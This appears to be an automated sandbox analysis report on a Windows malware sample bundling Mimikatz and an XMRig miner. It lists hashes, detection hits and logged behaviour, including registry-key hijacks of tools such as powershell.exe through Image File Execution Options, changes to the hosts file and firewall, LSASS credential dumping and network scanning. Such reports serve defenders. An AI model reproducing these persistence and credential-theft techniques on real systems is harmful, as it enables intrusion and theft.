Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 06:25
Behavioral task
behavioral1
Sample
2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
5a3bc856311cc408ca059a999d362ea2
-
SHA1
fbc147d4c4cc454593d782a7245b29d26aac6fe0
-
SHA256
95b7b0413f4918b4eb51c4904617647820db33da56ddbb1ac627c1f4e51996a3
-
SHA512
9433014f7d2e696a5ce5f8763f79534df75d2454f8497a36ba80206cba7e5a9a504c5066494717884963af67fe361efe2ea01178ec3b0fdb868d159b27633ab4
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1504 created 2116 1504 snutqkl.exe 38 -
Xmrig family
-
Contacts a large (18611) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/1700-176-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-181-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-198-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-211-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-224-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-233-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-242-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-495-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-496-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig behavioral2/memory/1700-498-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1684-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1684-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b9a-6.dat mimikatz behavioral2/memory/2464-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/784-138-0x00007FF7707E0000-0x00007FF7708CE000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts snutqkl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe snutqkl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2532 netsh.exe 2180 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 2464 snutqkl.exe 1504 snutqkl.exe 760 wpcap.exe 4440 vltbbrlit.exe 784 vfshost.exe 5112 iulpaulua.exe 1176 xohudmc.exe 1512 umueiy.exe 1700 jtpawa.exe 2736 iulpaulua.exe 3952 iulpaulua.exe 1856 iulpaulua.exe 1516 iulpaulua.exe 3676 iulpaulua.exe 532 iulpaulua.exe 3312 iulpaulua.exe 1776 iulpaulua.exe 864 iulpaulua.exe 1508 iulpaulua.exe 3556 snutqkl.exe 1932 iulpaulua.exe 3364 iulpaulua.exe 2736 iulpaulua.exe 3952 iulpaulua.exe 1888 iulpaulua.exe 4040 iulpaulua.exe 2924 ngliteqrb.exe 5824 snutqkl.exe -
Loads dropped DLL 12 IoCs
pid Process 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 760 wpcap.exe 4440 vltbbrlit.exe 4440 vltbbrlit.exe 4440 vltbbrlit.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 68 ifconfig.me 69 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache snutqkl.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 snutqkl.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 snutqkl.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 snutqkl.exe -
resource yara_rule behavioral2/files/0x0008000000023c70-134.dat upx behavioral2/memory/784-136-0x00007FF7707E0000-0x00007FF7708CE000-memory.dmp upx behavioral2/memory/784-138-0x00007FF7707E0000-0x00007FF7708CE000-memory.dmp upx behavioral2/files/0x0008000000023c89-141.dat upx behavioral2/memory/5112-142-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/5112-145-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/files/0x0008000000023c87-162.dat upx behavioral2/memory/1700-163-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/2736-170-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/3952-174-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-176-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1856-179-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-181-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1516-184-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/3676-188-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/532-192-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/3312-196-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-198-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1776-201-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/864-205-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1508-209-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-211-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1932-218-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/3364-222-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-224-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/2736-227-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/3952-230-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1888-232-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-233-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/4040-235-0x00007FF7C8010000-0x00007FF7C806B000-memory.dmp upx behavioral2/memory/1700-242-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1700-495-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1700-496-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx behavioral2/memory/1700-498-0x00007FF73C790000-0x00007FF73C8B0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\mtemsclch\taatftcev\wpcap.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\tucl-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\Shellcode.ini snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\wpcap.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\exma-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\ssleay32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\svschost.exe snutqkl.exe File opened for modification C:\Windows\fpibtvet\spoolsrv.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\snutqkl.exe 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe File created C:\Windows\mtemsclch\UnattendGC\specials\posh-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\trch-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\spoolsrv.xml snutqkl.exe File created C:\Windows\mtemsclch\Corporate\vfshost.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\trfo-2.dll snutqkl.exe File opened for modification C:\Windows\fpibtvet\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\cnli-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\Corporate\mimidrv.sys snutqkl.exe File created C:\Windows\fpibtvet\snutqkl.exe 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe File created C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\libeay32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\scan.bat snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\AppCapture32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\crli-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\AppCapture64.dll snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe snutqkl.exe File opened for modification C:\Windows\mtemsclch\taatftcev\Packet.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\coli-0.dll snutqkl.exe File created C:\Windows\ime\snutqkl.exe snutqkl.exe File created C:\Windows\mtemsclch\Corporate\mimilib.dll snutqkl.exe File opened for modification C:\Windows\mtemsclch\Corporate\log.txt cmd.exe File created C:\Windows\mtemsclch\UnattendGC\specials\libxml2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\ucl.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\xdvl-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\schoedcl.xml snutqkl.exe File created C:\Windows\fpibtvet\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\ip.txt snutqkl.exe File opened for modification C:\Windows\mtemsclch\taatftcev\Result.txt ngliteqrb.exe File created C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.exe snutqkl.exe File created C:\Windows\fpibtvet\docmicfg.xml snutqkl.exe File created C:\Windows\fpibtvet\schoedcl.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\tibe-2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.xml snutqkl.exe File created C:\Windows\fpibtvet\spoolsrv.xml snutqkl.exe File created C:\Windows\fpibtvet\vimpcsvc.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\schoedcl.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\upbdrjv\swrpwe.exe snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\Packet.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\zlib1.dll snutqkl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4292 sc.exe 388 sc.exe 2768 sc.exe 1952 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 